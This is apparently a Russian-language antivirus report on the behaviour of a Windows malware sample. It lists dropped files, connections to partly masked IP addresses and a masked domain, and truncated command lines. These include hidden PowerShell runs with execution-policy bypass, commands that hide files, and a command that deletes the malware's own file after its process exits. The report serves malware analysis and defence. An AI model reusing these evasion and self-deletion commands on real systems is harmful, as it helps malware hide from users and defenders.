Техническая информация
Изменения в файловой системе
Создает следующие файлы
- <SYSTEM32>\windowspowershell\v1.0\cuhmp.exe
- %TEMP%\qzohk.txt
Удаляет файлы, которые сам же создал
- %TEMP%\qzohk.txt
Сетевая активность
Подключается к
- '89.##5.85.102':58001
- '89.##5.85.102':58002
- '89.##5.85.102':58003
TCP
Другие
- '15#.#01.65.91':443
UDP
- DNS ASK su##.#4kdeliver.top
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/C powershell.exe -noprofile -w hidden -ep bypass -command [System.IO.File]::SetAttributes('<SYSTEM32>\WindowsPowerShell\v1.0\cuHmp.exe', [System.IO.FileAttributes]::Hidden); $gingerbread_PK0W... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noprofile -w hidden -ep bypass -command [System.IO.File]::SetAttributes('<SYSTEM32>\WindowsPowerShell\v1.0\cuHmp.exe', [System.IO.FileAttributes]::Hidden); $gingerbread_PK0W1R334M = [System.IO...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [System.Diagnostics.Process]::GetProcessById(5436);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C ATTRIB +H "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" & exit (со скрытым окном)
- '<SYSTEM32>\attrib.exe' +H "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"
